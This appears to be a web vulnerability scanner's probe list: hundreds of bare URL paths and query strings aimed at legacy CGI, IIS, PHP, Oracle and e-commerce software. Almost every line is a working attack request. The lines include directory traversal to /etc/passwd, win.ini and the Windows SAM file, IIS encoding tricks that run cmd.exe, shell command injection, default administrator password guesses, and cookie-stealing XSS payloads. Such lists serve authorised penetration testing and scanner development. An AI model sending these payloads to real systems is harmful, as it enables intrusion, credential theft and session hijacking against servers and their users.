cgi-bin/sendform.cgi
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
project/index.php?m=projects&user_cookie=1
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
active.log
?pattern=/etc/*&sort=name
images/?pattern=/etc/*&sort=name
debug/dbg?host==<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title===<script>alert('Vulnerable');</script>
debug/showproc?proc===<script>alert('Vulnerable');</script>
site/eg/source.asp
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
~nobody/etc/passwd
admin/db.php
admin/db.php?dump_sql=1
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
iissamples/exair/search/advsearch.asp
isqlplus
data/member_log.txt
data/userlog/log.txt
userlog.php
internal.sws?../../../../../../../../winnt/win.ini
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
ASP/cart/database/metacart.mdb
database/metacart.mdb
mcartfree/database/metacart.mdb
metacart/database/metacart.mdb
shop/database/metacart.mdb
shoponline/fpdb/shop.mdb
shopping/database/metacart.mdb
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
admin/phpinfo.php
start.php?config=alper.inc.php
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
cgi-bin/gettransbitmap
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
JUNK(5).xml
JUNK(5)/
cgi-bin/main_menu.pl
ban.bak
ban.dat
ban.log
banmat.pwd
admin/adminproc.asp
admin/datasource.asp
utils/sprc.asp
reports/temp/
cgi-bin/rtm.log
cgi-bin/VsSetCookie.exe?
addressbook.php?\"><script>alert(Vulnerable)</script><!--
options.php?optpage=<script>alert('Vulnerable!')</script>
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
help.php?chapter=<script>alert('Vulnerable')</script>
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/Webnews.exe
cgi-bin/webnews.pl
.../.../.../
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
texis.exe/?-dump
texis.exe/?-version
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
cgi-bin/sensepost.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
SiteServer/Publishing/ViewCode.asp
siteserver/publishing/viewcode.asp?source=/default.asp
shoutbox.php?conf=../../../../../../../etc/passwd
securelogin/1,2345,A,00.html
.%252e/.%252e/.%252e/winnt/boot.ini
add.php
class/mysql.class
inc/sendmail.inc
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
foo.php3
config.inc
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/iecreate.stm?template=../
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
catinfo
soap/servlet/soaprouter
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
JUNK(223)<font%20size=50>DEFACED<!--//--
MWS/HandleSearch.html?searchTarget=test&B1=Submit
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
server-info
cgi-bin/namazu.cgi
oekaki/
.nsconfig
cgi-bin/.nsconfig
?D=A
?N=D
?S=A
?M=A
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
dc/auth_data/auth_user_file.txt
dc/orders/orders.txt
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
applist.asp
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
cgi-bin/index.pl
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/classifieds/classifieds.cgi
cgi-bin/calendar/index.cgi
stronghold-info
stronghold-status
blah-whatever.jsp
gallery/index.php?include=../../../../../../../../../etc/passwd
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
phprocketaddin/?page=../../../../../../../../../../etc/passwd
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
demo/ojspext/events/globals.jsa
globals.jsa
pls/sample/admin_/help/..%255cplsql.conf
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
?\"><script>alert('Vulnerable');</script>
JUNK(10)abcd.html
iissamples/exair/howitworks/codebrws.asp
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.newatlanta.servletexec.JSP10Servlet/
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pass_done.php
admin/admin.php?adminpy=1
iishelp/iis/htm/tutorial/redirect.asp
Citrix/PNAgent/
Citrix/ICAWEB/
IBMWebAS/
IBMWebAS/docs/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/mbeanDocs/
iishelp/iis/misc/default.asp
Citrix/MetaFrameXP/default/login.asp
manager/html-manager-howto.html
manager/manager-howto.html
includes/adovbs.inc
adovbs.inc
fcgi-bin/echo
fcgi-bin/echo2
pls/ldc/admin_/
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
README
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
j2ee/
cgi-bin/printenv.tmp
perl/printenv
perl-status
WebCacheDemo.html
webcache/
webcache/webcache.xml
bmp/
bmp/global-web-application.xml
bmp/JSPClient.java
bmp/mime.types
bmp/README.txt
bmp/sqljdemo.jsp
bmp/setconn.jsp
ptg_upgrade_pkg.log
OA_HTML/oam/weboam.log
webapp/admin/_pages/_bc4jadmin/
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_demo/
_pages/_webapp/_jsp/
_pages/_demo/_sql/
/OA_HTML/_pages/
OA_HTML/webtools/doc/index.html
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
apex/
OA_JAVA/
OA_HTML/
aplogon.html
appdet.html
servlets/weboam/oam/oamLogin
OA_HTML/PTB/mwa_readme.htm
reports/rwservlet
reports/rwservlet/showenv
reports/rwservlet/showmap
reports/rwservlet/showjobs
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/showmap?server=myserver
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.signature
pls/portal/HTP.PRINT
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.home
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/SELECT
pls/portal/null
OA_MEDIA/
OA_HTML/META-INF/
OA_HTML/jsp/por/services/login.jsp
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/jsp/wf/WFReassign.jsp
OA_JAVA/Oracle/
OA_JAVA/servlet.zip
OA_JAVA/oracle/forms/registry/Registry.dat
OA_HTML/oam/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
install/install.php
_vti_bin/shtml.dll/_vti_rpc
cehttp/trace
cehttp/property/
webdav/index.html
hp-ux/
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
cgi-bin/showuser.cgi
cgi-bin/man2html
status?full=true
rpc.php?q="><script>alert(document.cookie)</script>
db.php?q='&t='
rpc.php?q='&t='